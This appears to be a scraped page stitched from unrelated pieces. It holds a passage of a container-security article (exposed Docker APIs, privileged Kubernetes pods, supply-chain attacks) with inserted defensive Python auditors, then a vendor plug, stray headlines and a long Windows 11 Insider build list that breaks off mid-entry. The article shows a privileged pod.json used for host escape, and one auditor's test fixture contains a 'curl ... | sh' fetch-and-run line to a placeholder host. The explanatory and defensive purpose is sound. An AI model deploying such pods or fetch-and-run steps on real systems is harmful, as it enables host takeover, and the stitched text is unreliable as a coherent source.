One of the most notorious examples of this vector is an exposed Docker API. If the Docker daemon is accessible over TCP without TLS or authentication, an attacker can remotely interact with the host system with permissions equivalent to a local administrator. They can deploy new containers custom-configured for attacks, mount the host’s entire root file system, and execute arbitrary commands within any container via the API. In practice, compromising an unauthenticated Docker API typically leads to a complete host takeover after just a few API requests.
Similar risks exist within Kubernetes environments. The Kubernetes API server acts as the central control point for the entire cluster. If an attacker manages to compromise a ServiceAccount token, exploit weak RBAC policies, or discover an inadvertently exposed API server, they can execute a broad spectrum of destructive operations.
For the sake of this attack example, let us assume that an attacker has compromised a Kubernetes API token for a privileged account. First, they enumerate the token’s permissions, typically by running a script to query each individual capability. This gives them a full list of Kubernetes privileges.
The script’s output reveals that the compromised API token grants exceptionally high privileges within the cluster. The logical next step in the attack chain is to deploy a malicious, privileged container to execute any of the host escape techniques described above. In our example, the attacker used a curl POST request to the API to create the container:
The configuration passed in the pod.json file is explicitly designed to enable an escape:
    {
      "apiVersion": "v1",
      "kind": "Pod",
      "metadata": {
        "name": "privileged-pod-from-api"
      },
      "spec": {
        "containers": [
          {
            "name": "debug-container",
            "image": "ubuntu:latest",
            "command": ["sleep", "3600"],
            "securityContext": {
              "privileged": true
            }
          }
        ]
      }
    }
Once the privileged container is deployed, the attacker can execute an escape to compromise the underlying host system.
However, this is not the only high-risk scenario involving API requests. For instance, when a Docker socket is mounted inside a container, an attacker gains the ability to interact with the Docker daemon directly. Once that container is compromised, the attacker effectively inherits the privileges of the daemon, which means they gain control over all containers on the host.
To execute the attack, adversaries look for containers with mounted sockets. The further progression of the attack replicates what has been described above: an API request is made to create a privileged container, after which any escape method is similarly exploited using the API.
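A manifest like the pod.json above can be rejected before it reaches the cluster. The following added example (not part of the original article) audits a Pod or workload manifest for the settings this article describes: privileged mode, the four capabilities, hostPID, hostNetwork, hostPath and a mounted Docker socket, plus the capability-and-setting combinations it calls out. The rule names and the second manifest are assumptions constructed for illustration.

```python
import json

# Capabilities the article singles out (Kubernetes writes them without the CAP_ prefix).
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE", "NET_ADMIN"}
# Capability -> the setting that, per the article, extends its reach to the host.
COMBINATIONS = {"SYS_PTRACE": "hostPID", "NET_ADMIN": "hostNetwork", "SYS_ADMIN": "hostPath"}
DOCKER_SOCKETS = ("/var/run/docker.sock", "/run/docker.sock")


def pod_spec(manifest):
    """Return (name, PodSpec) for a Pod, a workload with spec.template, or a CronJob."""
    spec = manifest.get("spec") or {}
    if manifest.get("kind") == "CronJob":
        spec = (spec.get("jobTemplate") or {}).get("spec") or {}
    if "template" in spec:
        spec = (spec["template"] or {}).get("spec") or {}
    return (manifest.get("metadata") or {}).get("name", "<unnamed>"), spec


def exposes_docker_socket(host_path):
    """True if the hostPath is the socket itself or a directory that contains it."""
    base = host_path.rstrip("/")
    return any(s == base or s.startswith(base + "/") for s in DOCKER_SOCKETS)


def audit_manifest(manifest):
    """Return a sorted list of (scope, rule, detail) findings."""
    name, spec = pod_spec(manifest)
    findings = set()
    host_flags = {f for f in ("hostPID", "hostNetwork") if spec.get(f) is True}
    for flag in host_flags:
        findings.add((name, flag, "pod shares a host namespace"))
    host_paths = {}
    for vol in spec.get("volumes") or []:
        path = (vol.get("hostPath") or {}).get("path")
        if path is not None:
            host_paths[vol.get("name")] = path

    for group in ("initContainers", "containers", "ephemeralContainers"):
        for ctr in spec.get(group) or []:
            scope = "%s/%s" % (name, ctr.get("name", "?"))
            sec = ctr.get("securityContext") or {}
            if sec.get("privileged") is True:
                findings.add((scope, "privileged", "all capabilities and host devices"))
            added = set()
            for cap in (sec.get("capabilities") or {}).get("add") or []:
                cap = str(cap).upper()
                added.add(cap[4:] if cap.startswith("CAP_") else cap)
            if "ALL" in added:
                findings.add((scope, "cap-ALL", "capabilities.add contains ALL"))
                added |= DANGEROUS_CAPS
            mounted = {host_paths[m["name"]] for m in ctr.get("volumeMounts") or []
                       if m.get("name") in host_paths}
            for path in mounted:
                findings.add((scope, "hostPath", path))
                if exposes_docker_socket(path):
                    findings.add((scope, "docker-socket", path))
            present = host_flags | ({"hostPath"} if mounted else set())
            for cap in added & DANGEROUS_CAPS:
                findings.add((scope, "cap-" + cap, "added capability"))
                if COMBINATIONS.get(cap) in present:
                    findings.add((scope, "combo-%s+%s" % (cap, COMBINATIONS[cap]),
                                  "capability reaches the host"))
    return sorted(findings)


# The pod.json shown in the article.
PAGE_POD = json.loads("""
{"apiVersion": "v1", "kind": "Pod",
 "metadata": {"name": "privileged-pod-from-api"},
 "spec": {"containers": [{"name": "debug-container", "image": "ubuntu:latest",
                          "command": ["sleep", "3600"],
                          "securityContext": {"privileged": true}}]}}
""")

# Constructed sample: a Deployment combining several of the described settings.
CONSTRUCTED_DEPLOYMENT = {
    "apiVersion": "apps/v1", "kind": "Deployment",
    "metadata": {"name": "ci-agent"},
    "spec": {"template": {"spec": {
        "hostPID": True,
        "volumes": [{"name": "dock", "hostPath": {"path": "/var/run/docker.sock"}}],
        "containers": [{
            "name": "agent", "image": "registry.example.invalid/agent:1.0",
            "securityContext": {"capabilities": {"add": ["SYS_PTRACE", "CAP_SYS_ADMIN"]}},
            "volumeMounts": [{"name": "dock", "mountPath": "/var/run/docker.sock"}],
        }],
    }}},
}

if __name__ == "__main__":
    for doc in (PAGE_POD, CONSTRUCTED_DEPLOYMENT):
        for scope, rule, detail in audit_manifest(doc):
            print("%-45s %-28s %s" % (scope, rule, detail))
```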
Supply chain attacks
Unlike classic attacks aimed at exploiting vulnerabilities in already deployed containers, this approach focuses on compromising components before they are even launched in the runtime environment. Modern container infrastructure is tightly integrated with a large number of external components. As a result, container security directly depends not only on the application itself, but on the entire image build and delivery chain. Compromising any of these stages potentially allows an attacker to inject malicious code into multiple containers and services simultaneously.
One of the most common scenarios involves attacks that contaminate container images. In many organizations, developers use public images from Docker Hub or other available sources without a full verification of their origin or contents. Threat actors frequently publish contaminated images that masquerade as popular services and utilities. Once a container like that is launched within the infrastructure, the attacker gains the ability to execute their own code right inside the organization’s trusted environment.
Furthermore, CI/CD container deployment systems are among the most frequent targets of these attacks. Application build and delivery platforms typically possess elevated privileges. For instance, after gaining access to a CI/CD system, an attacker can covertly modify the Docker image build stages. Instead of altering the application’s source code, the attacker can inject the malicious logic directly into the pipeline itself. An additional command during the build process can download a third-party binary, add a hidden script, modify the container configuration, or implant a remote management mechanism. Externally, the container will look completely legitimate because its core functionality remains unchanged.
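Both risks above, unverified base images and an extra command slipped into a build stage, can be surfaced by comparing a Dockerfile against its last reviewed version. This is an added example, not from the original article: it flags base images that are not pinned by digest and build steps that download content, then reports only what is new relative to the baseline. The rule names, both Dockerfiles, the URL and the digest are constructed placeholders.

```python
import re

DIGEST = re.compile(r"@sha256:[0-9a-f]{64}$")
FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|da|z)?sh\b")
URL = re.compile(r"https?://\S+")


def instructions(text):
    """Yield (KEYWORD, arguments), joining backslash continuations and dropping comments."""
    pending = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            pending += line[:-1] + " "
            continue
        keyword, _, args = (pending + line).strip().partition(" ")
        pending = ""
        yield keyword.upper(), args.strip()


def audit_dockerfile(text):
    """Return a list of (rule, detail) findings in file order."""
    findings, stages = [], set()
    for keyword, args in instructions(text):
        if keyword == "FROM":
            words = [w for w in args.split() if not w.startswith("--")]
            if not words:
                continue
            image = words[0]
            if image != "scratch" and image.lower() not in stages:
                if "$" in image:
                    # Resolved from a build argument: cannot be verified statically.
                    findings.append(("from-variable", image))
                elif not DIGEST.search(image):
                    tag = image.rsplit("/", 1)[-1].partition(":")[2]
                    rule = "from-floating-tag" if tag in ("", "latest") else "from-unpinned"
                    findings.append((rule, image))
            if len(words) >= 3 and words[1].upper() == "AS":
                stages.add(words[2].lower())  # later FROM lines may reuse this stage
        elif keyword == "RUN" and FETCH.search(args):
            rule = "run-pipe-to-shell" if PIPE_TO_SHELL.search(args) else "run-download"
            findings.append((rule, args))
        elif keyword == "ADD" and URL.search(args):
            findings.append(("add-remote-url", args))
    return findings


def new_findings(baseline, current):
    """Findings in the current Dockerfile that the reviewed baseline did not have."""
    known = audit_dockerfile(baseline)
    return [f for f in audit_dockerfile(current) if f not in known]


PLACEHOLDER_DIGEST = "sha256:" + "a" * 64  # constructed, not a real image digest

# Constructed baseline: the version of the Dockerfile that passed review.
BASELINE = """\
FROM golang:1.22@%s AS build
COPY . /src
RUN cd /src && go build -o /out/app ./cmd/app
FROM scratch
COPY --from=build /out/app /app
""" % PLACEHOLDER_DIGEST

# Constructed current version: the pin was dropped and a fetch step was added.
CURRENT = """\
FROM golang:latest AS build
COPY . /src
RUN cd /src && go build -o /out/app ./cmd/app
# telemetry
RUN curl -fsSL https://example.invalid/setup.sh \\
    | sh
FROM scratch
COPY --from=build /out/app /app
"""

if __name__ == "__main__":
    for rule, detail in new_findings(BASELINE, CURRENT):
        print("%-20s %s" % (rule, detail))
```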
Takeaways
Overall, modern attacks on container environments demonstrate that the primary threat arises not just from within the container itself, but from the implementation of the container infrastructure as a whole. Containers are frequently exploited as an initial foothold to establish persistence within a system; following an initial compromise, attackers aim to either escalate to the host OS level or gain control over infrastructure management via containerization and orchestration APIs. To achieve this, they exploit weak configurations, excessive capabilities, and isolation flaws.
Furthermore, there is a visible trend of attacks shifting toward CI/CD pipelines, where compromising a single component can lead to a full infrastructure takeover. Therefore, under current realities, securing containerized environments requires an approach that encompasses host protection, strict access control within the orchestrator, minimization of container capabilities, and comprehensive validation of the entire supply chain. Our solution, Kaspersky Container Security, has been designed with the specific characteristics of container environments in mind and provides protection at various levels, from container images to the host system, helping to implement the principles of secure software development.
OpenAI Codex Authentication Tokens Stolen in codexui-android npm Supply Chain Attack
Critical WP Maps Pro Flaw Actively Exploited to Create Admin Accounts
Windows 11 Insider Previews: What’s in the latest build?
Windows 11 25H2 has been publicly released, but behind the scenes, Microsoft is constantly working to improve the newest version of Windows. The company frequently rolls out preview builds to members of its Windows Insider Program, allowing them to test out — and help shape — upcoming features.
Our story “How to preview and deploy Windows 10 and 11 updates” details how the Insider program has worked until now. However, Microsoft recently announced sweeping changes to the program that will include the ability to select which new features to test. As the first step, the company is introducing a new channel system and transitioning Insiders like so:
- Beta Channel > Beta
- Dev Channel > Experimental
- Canary Channel (28000 series) > Experimental (26H1)
- Canary Channel (29500 series) > Experimental (Future Platforms)
- Release Preview Channel (for devices on Windows 11 versions 24H2 and 25H2) > Release Preview 24H2/25H2
- Release Preview Channel (for devices on Windows 11 version 26H1) > Release Preview 26H1
This transition is happening over time, starting with the Dev Channel. See Microsoft’s blog post for more information about the transition.
Below you’ll find information about the Windows 11 preview builds that have been announced by Microsoft in the past six months. For each build, we’ve included the date of its release, which Insider channel it was released to, a summary of what’s in the build, and a link to Microsoft’s announcement about it.
Note: If you’re looking for information about updates being rolled out to all Windows 11 users, not preview builds for Windows Insiders, see “Windows 11: A guide to the updates.”
The latest Windows 11 Insider preview builds
Windows 11 Insider Preview Build 26220.8544
Release date: May 29, 2026
Released to: Beta Channel
Several minor new improvements and fixes are being rolled out in this build, including consistent solid (donut) spinners across key Windows scenarios including Boot, Logon, Restart, Shutdown, and Update. This update replaces legacy spinner visuals to deliver a more cohesive experience aligned with Windows design standards. Users will now see a unified spinner behavior with corresponding status text (e.g., “Restarting”, “Working on updates”, “Welcome”).
(Get more info about Windows 11 Insider Preview Build 26220.8544.)
Windows 11 Insider Preview Build 26300.8553
Release date: May 29, 2026
Released to: Experimental Channel (formerly Dev)
Several minor new features are being rolled out gradually in this build, including a number of changes to the Start menu. These were first outlined in the May 15 Insider blog post Making Taskbar and Start more personal. They include:
- “Recommended” section renamed to “Recent” in Start and Settings page
- Section-level toggles to independently show or hide Pinned, Recommended, and All
- Choose between a small and large Start menu, in addition to already available “Automatic (default)” setting
- Option to hide your name and profile picture in Start
- Redesigned Start menu settings page
One known issue, in which resetting your PC may have gotten stuck when using “Reset this PC,” has been fixed.
(Get more info about Windows 11 Insider Preview Build 26300.8553.)
Windows 11 Insider Preview Build 28020.2207
Release date: May 29, 2026
Released to: Experimental 26H1 Channel (formerly Canary)
This update, in Microsoft’s words, “includes a small number of minor bug fixes and improvements.”
(Get more info about Windows 11 Insider Preview Build 28020.2207.)
Windows 11 Insider Preview Build 29599.1000
Release date: May 29, 2026
Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)
This build gradually rolls out several minor changes and improvements that, in the words of Microsoft, include “platform changes in moving to a new active development build.” The update also gradually rolls out a fix for a bug in which some Insiders unexpectedly saw an erroneous message saying they weren’t connected to the internet (when they actually were) when signing into their Microsoft account in certain apps. It also improves CPU speed display on the Performance page of Task Manager for VMs, so it doesn’t show higher-than-expected numbers after resuming from hibernate.
There is one known issue that causes crashes with AMD machines supporting System Guard, so these devices in Windows Information Protection will not be offered the build.
(Get more info about Windows 11 Insider Preview Build 29599.1000.)
Windows 11 Insider Preview Build 26220.8491
Release date: May 22, 2026
Released to: Beta Channel
This update, in Microsoft’s words, “includes a small number of minor bug fixes and improvements.” It introduces Voice Isolation, a new option in Voice Access that helps the tool focus on your voice, even when others are speaking nearby, by filtering out other voices and background noise.
Microsoft says the single known issue with this release, in which your PC could have gotten stuck when using “Reset this PC,” has been fixed.
(Get more info about Windows 11 Insider Preview Build 26220.8491.)
Windows 11 Insider Preview Build 26300.8497
Release date: May 22, 2026
Released to: Experimental Channel (formerly Dev)
A variety of new features are being rolled out gradually in this build, including several to improve accessibility. Among them are making it easier to connect the Braille display to Narrator by using the HID open industry standard for Braille displays. If your display supports HID, connect it via USB, with no additional setup required. For Bluetooth, pair your HID Braille display in Settings > Bluetooth & devices just like any other accessory. Another new feature is Voice Isolation in Voice Access, as detailed for Beta Channel Build 26220.8491 above.
The build has one known issue, in which your PC may get stuck when using “Reset this PC.” To complete the reset successfully, choose the cloud download option (Cloud PBR) instead of local.
(Get more info about Windows 11 Insider Preview Build 26300.8497.)
Windows 11 Insider Preview Build 28020.2149
Released to: Experimental 26H1 Channel (formerly Canary)
Release date: May 22, 2026
This build, for Insiders using Windows 11 26H1, gradually rolls out a wide variety of new features, including one that improves the reliability of explorer.exe when closing the input switcher, and when switching between multiple desktops.
Microsoft says the single known issue with this release, in which your PC could have gotten stuck when using “Reset this PC,” has been fixed.
(Get more info about Windows 11 Insider Preview Build 28020.2149.)
Windows 11 Insider Preview Build 29595.1000
Release date: May 22, 2026
Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)
This build, in the words of Microsoft, “includes platform changes in moving to a new active development build.”
(Get more info about Windows 11 Insider Preview Build 29595.1000.)
Windows 11 Insider Preview Build 26220.8474
Release date: May 15, 2026
Released to: Beta Channel
Several minor new improvements are being rolled out in this build, including one that improves the reliability of Simple Service Discovery Protocol (SSDP) notifications to help prevent the service from becoming unresponsive.
It has one known issue in which your PC may get stuck when using “Reset this PC.” To complete the reset successfully, choose the cloud download option (Cloud PBR) instead of local.
(Get more info about Windows 11 Insider Preview Build 26220.8474.)
Windows 11 Insider Preview Build 26300.8493
Release date: May 15, 2026
Released to: Experimental Channel (formerly Dev)
A variety of new features are being rolled out gradually in this build, including the ability to change the position of taskbar on your screen. In Settings > Personalization > Taskbar > Taskbar Behaviors, you can select the side of the screen you want your taskbar on: bottom, top, left, or right. In these other positions, tooltips, flyouts, and animations will still come from the taskbar, and most customization settings like “small taskbar” and “never combine taskbar icons” will work with all locations.
It has one known issue in which your PC may get stuck when using “Reset this PC.” To complete the reset successfully, choose the cloud download option (Cloud PBR) instead of local.
(Get more info about Windows 11 Insider Preview Build 26300.8493.)
Windows 11 Insider Preview Build 28020.2134
Release date: May 15, 2026
Released to: Experimental 26H1 Channel (formerly Canary)
This build gradually rolls out an improvement in the reliability of Simple Service Discovery Protocol (SSDP) notifications to help prevent the service from becoming unresponsive. It also rolls out gradual changes to updating Windows, including the ability to skip updates immediately during the out of box experience (OOBE) and to extend update pauses as many times as you need.
It has one known issue in which your PC may get stuck when using “Reset this PC.” To complete the reset successfully, choose the cloud download option (Cloud PBR) instead of local.
(Get more info about Windows 11 Insider Preview Build 28020.2134.)
Windows 11 Insider Preview Build 29591.1000
Release date: May 15, 2026
Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)
This build introduces new features for Windows Update, including the ability to skip updates immediately during the out of box experience (OOBE) and to extend update pauses as many times as you need. New Windows update features also include having always available options to shut down and restart with updating, and additional insight about available updates to make more informed installation decisions.
(Get more info about Windows 11 Insider Preview Build 29591.1000.)
Windows 11 Insider Preview Builds 26200.8514/26200.8514
Release date: May 14, 2026
Released to: Release Preview 24H2/25H2 Channel
A wide variety of features and enhancements are being gradually rolled out in this build, including a new shared audio feature that allows two people to listen to the same audio from a single Windows 11 PC at the same time. In addition, Task Manager now offers improved visibility into NPU usage on PCs with an NPU. New optional NPU and NPU Engine columns are available on the Processes, Users, and Details pages, along with NPU Dedicated Memory and NPU Shared Memory optional columns on the Details page.
One new feature is being rolled out immediately, in which Windows quality updates now include additional high-confidence device targeting data, increasing coverage of devices eligible to automatically receive new Secure Boot certificates. Devices receive the new certificates only after demonstrating sufficient successful update signals, maintaining a controlled and phased rollout.
(Get more info about Windows 11 Insider Preview Builds 26200.8514/26220.8514.)
Windows 11 Insider Preview Build 28000.2173
Released to: Release Preview 26H1 Channel
Release date: May 14, 2026
This build, for Insiders using Windows 11 26H1, gradually rolls out a wide variety of new features, including one that expands the list of archive formats that can be used in File Explorer to include uu, cpio, xar, and NuGet Packages (nupkg). Also being gradually rolled out is a new way to monitor your agents from the taskbar. It supports agents across first- and third-party apps, with Researcher in the Microsoft 365 Copilot app as the first adopter.
One new feature is being rolled out immediately, in which Windows quality updates now include additional high-confidence device targeting data, increasing coverage of devices eligible to automatically receive new Secure Boot certificates. Devices receive the new certificates only after demonstrating sufficient successful update signals, maintaining a controlled and phased rollout.
(Get more info about Windows 11 Insider Preview Build 28000.2173.)
Windows 11 Insider Preview Build 26220.8370
Release date: May 8, 2026
Released to: Beta Channel
Several minor new improvements are being gradually rolled out in this build, including improved reliability of Japanese IME usage when Administrator Protection is enabled. In addition, the build fixes a single bug, in which there were notification issues and certain apps hung on launch.
(Get more info about Windows 11 Insider Preview Build 26220.8370.)
Windows 11 Insider Preview Build 26300.8376
Release date: May 8, 2026
Released to: Experimental Channel (formerly Dev)
A variety of new features are being rolled out gradually in this build, including new File Explorer address bar support for paths containing double backslashes and quotation marks (for example, C:\Users\user or “C:\Users\user”), improving compatibility with a wider range of inputs.
(Get more info about Windows 11 Insider Preview Build 26300.8376.)
Windows 11 Insider Preview Build 28020.2075
Release date: May 8, 2026
Released to: Experimental 26H1 Channel (formerly Canary)
This build gradually rolls out, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience” of running Windows 26H1. It also improves performance when opening clipboard history.
(Get more info about Windows 11 Insider Preview Build 28020.2075.)
Windows 11 Insider Preview Build 29585.1000
Release date: May 6, 2026
Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)
This build gradually rolls out, in Microsoft’s words, “platform changes in moving to a new active development build.”
It also updates the experience when you use voice typing with the touch keyboard. To reduce distractions, the new design removes the previous full‑screen overlay and instead shows voice typing animations directly on the dictation key.
(Get more info about Windows 11 Insider Preview Build 29585.1000.)
Windows 11 Insider Preview Build 26220.8340
Release date: May 1, 2026
Released to: Beta Channel
Several minor new improvements are being gradually rolled out in this build, including making Windows ShareSheet more intelligent for Azure Active Directory (AAD) users, with a simple setting to turn promotional app recommendations on or off. Previously, that capability was only available to Windows users with Managed Service Accounts (MSA).
(Get more info about Windows 11 Insider Preview Build 26220.8340.)
Windows 11 Insider Preview Build 26300.8346
Release date: May 1, 2026
Released to: Experimental Channel (formerly Dev)
A variety of new features are being rolled out gradually in this build, including making Windows ShareSheet more intelligent for Azure Active Directory (AAD) users, with a simple setting to turn promotional app recommendations on or off. Previously, that capability was only available to Windows users with Managed Service Accounts (MSA). Another change “quiets” the default behavior for Widgets, with the goal of making them feel less distracting and overwhelming.
There are several known issues in this build, including one in which Insiders who use Feature flags to enable the new WIP experience may see the feature state incorrectly marked as current; however, changing state and applying changes will work as expected.
(Get more info about Windows 11 Insider Preview Build 26300.8346.)
Windows 11 Insider Preview Build 28020.1921
Release date: May 1, 2026
Released to: Experimental 26H1 Channel (formerly Canary)
This build gradually rolls out several improvements to Task Manager, including one that provides better insight into NPU usage for PCs that include an NPU. Optional NPU and NPU Engine columns are now available on the Processes, Users, and Details pages, with optional NPU Dedicated Memory and NPU Shared Memory columns on the Details page to give you deeper visibility into how workloads are using NPU resources. Additionally, if there are neural engines that are part of a GPU, they will now appear on the Performance page, providing a more complete view of AI‑related system activity.
(Get more info about Windows 11 Insider Preview Build 28020.1921.)
Windows 11 Insider Preview Build 29580.1000
Release date: May 1, 2026
Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)
This build gradually rolls out, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running this build on their PCs.”
(Get more info about Windows 11 Insider Preview Build 29580.1000.)
Windows 11 Insider Preview Build 26220.8283
Release date: April 24, 2026
Released to: Beta Channel
Several minor new improvements and fixes are being gradually rolled out in this build, including improved detection of clicks at the leftmost edge of the taskbar to invoke the Start menu when the taskbar icons are left-aligned.
(Get more info about Windows 11 Insider Preview Build 26220.8283.)
Windows 11 Insider Preview Build 26300.8289
Release date: April 24, 2026
Released to: Experimental Channel (formerly Dev)
In a phased rollout, Insiders in the Dev Channel are being moved to the new Experimental channel. Insiders who do not see the new experience on their device can enable it under Settings > Windows Update > Windows Insider Program > Feature flags.
Several minor new features are also being rolled out gradually in this build, including improved detection of clicks at the leftmost edge of the taskbar to invoke the Start menu when the taskbar icons are left-aligned.
There is one known issue in this build: Insiders who use Feature flags to enable the new Insider experience may see the feature state incorrectly marked as current; however, changing the state and applying changes should work as expected.
(Get more info about Windows 11 Insider Preview Build 26300.8289.)
Windows 11 Insider Preview Build 28200.1873
Release date: April 24, 2026
Released to: Experimental 26H1 Channel (formerly Canary)
This build is gradually rolling out a variety of small improvements, including an updated voice typing experience for the touch keyboard. To reduce distractions, the new design shows voice typing animations directly on the dictation key rather than on a full-screen overlay.
It also fixes a bug in which Settings > Network & Internet > Data Usage showed large, unrealistic values.
(Get more info about Windows 11 Insider Preview Build 28200.1873.)
Windows 11 Insider Preview Build 29576.1000
Release date: April 24, 2026
Released to: Experimental Future Platforms Channel (formerly Canary optional 29500)
This build is gradually rolling out a variety of changes, including Point-in-time restore for Windows, which can quickly roll your device back to a previous state, potentially helping minimize downtime and simplify troubleshooting when disruptions strike.
(Get more info about Windows 11 Insider Preview Build 29576.1000.)
Windows 11 Builds 26100.8313 and 26200.8313 (KB5083631)
Release date: April 17, 2026
Released to: Release Preview Channel
This build introduces a wide variety of new features rolled out gradually, including a new way to monitor your agents from the taskbar. It supports agents across first- and third-party apps, with Researcher in the Microsoft 365 Copilot app as the first adopter. When Researcher works on a report, Windows shows progress on the taskbar so you can check updates at a glance.
For IT administrators, the update gradually rolls out support for a dynamic app removal list to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education. It also removes default trust for cross‑signed third-party drivers, while drivers from the Windows Hardware Compatibility Program (WHCP) and an allow list of trusted legacy drivers remain allowed. Enterprise State Roaming can now be managed through Windows Backup for Organizations policies.
The update also immediately introduces two minor improvements for everyone. Windows quality updates now include additional high-confidence device targeting data, which increases coverage of devices eligible to automatically receive new Secure Boot certificates. In Windows Security, the name of the affected application is now included in event logging related to CVE‑2024‑30098. This change makes it easier to identify applications that rely on smart card certificates and may need updates following recent security changes.
(Get more info about Windows 11 Builds 26100.8313 and 26200.8313.)
Windows 11 Insider Preview Build 26220.8271
Release date: April 17, 2026
Released to: Beta Channel
Several minor new features were made available in this build for those who have turned the toggle on to receive the latest updates, including improved reliability and performance of Windows Hello fingerprint after your PC wakes from sleep.
(Get more info about Windows 11 Insider Preview Build 26220.8271.)
Windows 11 Insider Preview Build 26300.8276
Release date: April 17, 2026
Released to: Dev Channel
In this build, several minor new features are being gradually rolled out for those who have turned the toggle on to receive the latest updates, including improved reliability and performance of Windows Hello fingerprint after your PC wakes from sleep.
(Get more info about Windows 11 Insider Preview Build 26300.8276.)
Windows 11 Insider Preview Build 28020.1863
Release date: April 17, 2026
Released to: Canary Channel
For those who have turned the toggle on to receive the latest updates, this build fixes a bug that prevented some apps from signing in due to a false report of no internet connectivity. The fix is rolling out gradually.
(Get more info about Windows 11 Insider Preview Build 28020.1863.)
Windows 11 Insider Preview Build 29570.1000
Release date: April 17, 2026
Released to: Canary Channel (29500 build series)
For those who have turned the toggle on to receive the latest updates in the Canary Channel on the optional 29500 build series, this build has a variety of minor changes rolling out gradually, including more widget options and support for lock screen widget personalization, a new setting in Settings > Bluetooth & Devices > Touchpad that lets you choose how large the right-click zone is, and support for a dynamic app removal list in the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education.
(Get more info about Windows 11 Insider Preview Build 29570.1000.)
Windows 11 Insider Preview Build 26220.8165
Release date: April 10, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including one in which the size limit for formatting FAT32 volumes via the command line has increased from 32GB to 2TB, and another in which the Windows Security app gets new badges and text that reflect your device’s Secure Boot state and certificate status.
It also gradually rolls out a fix for a bug that caused Settings > Network & Internet > Data Usage to show large, unrealistic values.
(Get more info about Windows 11 Insider Preview Build 26220.8165.)
Windows 11 Insider Preview Build 26300.8170
Release date: April 10, 2026
Released to: Dev Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including one in which the size limit for formatting FAT32 volumes via the command line has increased from 32GB to 2TB, and another in which the Windows Security app gets new badges and text that reflect your device’s Secure Boot state and certificate status.
It also gradually rolls out a fix for a bug that caused Settings > Network & Internet > Data Usage to show large, unrealistic values.
(Get more info about Windows 11 Insider Preview Build 26300.8170.)
Windows 11 Insider Preview Build 28020.1812
Release date: April 10, 2026
Released to: Canary Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out general improvements and fixes, including a new setting that lets users choose the size of their touchpad’s right-click zone, as well as new badges and text in the Windows Security app that reflect your device’s Secure Boot state and certificate status.
(Get more info about Windows 11 Insider Preview Build 28020.1812.)
Windows 11 Insider Preview Build 29565.1000
Release date: April 10, 2026
Released to: Canary Channel (29500 build series)
For those who have turned the toggle on to receive the latest updates in the Canary Channel on the optional 29500 build series, this build includes “platform changes in moving to a new active development build,” as well as new badges and text in the Windows Security app that reflect your device’s Secure Boot state and certificate status.
(Get more info about Windows 11 Insider Preview Build 29565.1000.)
Windows 11 Insider Preview Build 26220.8148
Release date: April 3, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including a new icon in print settings to indicate when a printer supports Windows Protected Print Mode.
Several bugs are also being fixed, including one in which some apps weren’t able to sign in, citing an internal connection issue when internet was actually connected.
(Get more info about Windows 11 Insider Preview Build 26220.8148.)
Windows 11 Insider Preview Build 26300.8155
Release date: April 3, 2026
Released to: Dev Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several minor features, including one in which users will be able to feel haptic feedback effects on compatible input devices while performing certain actions, such as aligning objects in PowerPoint, window snapping, resizing, or hovering over the Close button. These haptic effects can be configured in Settings under Bluetooth & devices > Mouse > Haptic signals.
Several bugs have also been fixed, including one in which some apps weren’t able to sign in, citing an internal connection issue when internet was actually connected.
(Get more info about Windows 11 Insider Preview Build 26300.8155.)
Windows 11 Insider Preview Build 28020.1803
Release date: April 3, 2026
Released to: Canary Channel
For those who have turned the toggle on to receive the latest updates in the Canary Channel, this build includes a small set of general improvements and fixes, including improved reliability for configuring the fluid dictation option in voice typing settings.
(Get more info about Windows 11 Insider Preview Build 28020.1803.)
Windows 11 Insider Preview Build 29560.1000
Release date: April 3, 2026
Released to: Canary Channel (29500 build series)
For those who have turned the toggle on to receive the latest updates in the Canary Channel on the optional 29500 build series, this build “includes platform changes in moving to a new active development build,” in the words of Microsoft. Several bugs have also been fixed, including one in which attached USB devices weren’t working for some Insiders.
(Get more info about Windows 11 Insider Preview Build 29560.1000.)
Windows 11 Insider Preview Build 26220.8138
Release date: March 30, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including one in which you can enable Administrator Protection by going to Settings > Privacy & security > Windows Security > Account protection and switching the toggle to on. A restart will be required.
(Get more info about Windows 11 Insider Preview Build 26220.8138.)
Windows 11 Insider Preview Build 26300.8142
Release date: March 30, 2026
Released to: Dev Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including one in which you can enable Administrator Protection by going to Settings > Privacy & security > Windows Security > Account protection and switching the toggle to on. A restart will be required.
(Get more info about Windows 11 Insider Preview Build 26300.8142.)
Windows 11 Insider Preview Build 28020.1797
Release date: March 30, 2026
Released to: Canary Channel
This update, in the words of Microsoft, “includes a small set of general improvements and fixes that improve the overall experience” of running Windows 11.
(Get more info about Windows 11 Insider Preview Build 28020.1797.)
Windows 11 Insider Preview Build 29558.1000
Release date: March 30, 2026
Released to: Canary Channel (29500 build series)
For those who have turned the toggle on to receive the latest updates in the Windows 11 Insider Canary Channel on the optional 29500 build series, this build introduces several new features, including a variety of improvements to the Windows Console, many of which were created by open-source contributors. Several bugs have also been fixed, including an authentication error people received when trying to connect to Azure Virtual Desktop.
(Get more info about Windows 11 Insider Preview Build 29558.1000.)
Windows 11 Insider Preview Build 26220.8079
Release date: March 20, 2026
Released to: Beta Channel
